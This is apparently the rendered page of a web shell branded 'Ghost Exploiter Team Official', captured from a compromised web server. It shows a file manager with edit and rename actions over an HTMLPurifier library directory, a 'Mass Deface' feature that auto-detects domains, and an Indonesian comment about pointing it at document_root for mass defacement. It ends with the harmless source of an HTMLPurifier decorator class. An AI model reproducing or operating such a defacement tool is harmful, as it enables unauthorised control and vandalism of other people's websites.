Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
ezyang
/
htmlpurifier
/
library
/
HTMLPurifier
/
AttrDef
/
CSS
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AlphaValue.php
0.774KB
edt
ren
Background.php
3.235KB
edt
ren
BackgroundPosition.php
4.068KB
edt
ren
Border.php
1.554KB
edt
ren
Color.php
4.57KB
edt
ren
Composite.php
1.301KB
edt
ren
DenyElementDecorator.php
1.05KB
edt
ren
Filter.php
2.271KB
edt
ren
Font.php
6.454KB
edt
ren
FontFamily.php
9.127KB
edt
ren
Ident.php
0.707KB
edt
ren
ImportantDecorator.php
1.56KB
edt
ren
Length.php
1.853KB
edt
ren
ListStyle.php
2.843KB
edt
ren
Multiple.php
2.043KB
edt
ren
Number.php
2.233KB
edt
ren
Percentage.php
1.249KB
edt
ren
Ratio.php
1.201KB
edt
ren
TextDecoration.php
1.129KB
edt
ren
URI.php
2.508KB
edt
ren
<?php /** * Decorator which enables CSS properties to be disabled for specific elements. */ class HTMLPurifier_AttrDef_CSS_DenyElementDecorator extends HTMLPurifier_AttrDef { /** * @type HTMLPurifier_AttrDef */ public $def; /** * @type string */ public $element; /** * @param HTMLPurifier_AttrDef $def Definition to wrap * @param string $element Element to deny */ public function __construct($def, $element) { $this->def = $def; $this->element = $element; } /** * Checks if CurrentToken is set and equal to $this->element * @param string $string * @param HTMLPurifier_Config $config * @param HTMLPurifier_Context $context * @return bool|string */ public function validate($string, $config, $context) { $token = $context->get('CurrentToken', true); if ($token && $token->name == $this->element) { return false; } return $this->def->validate($string, $config, $context); } } // vim: et sw=4 sts=4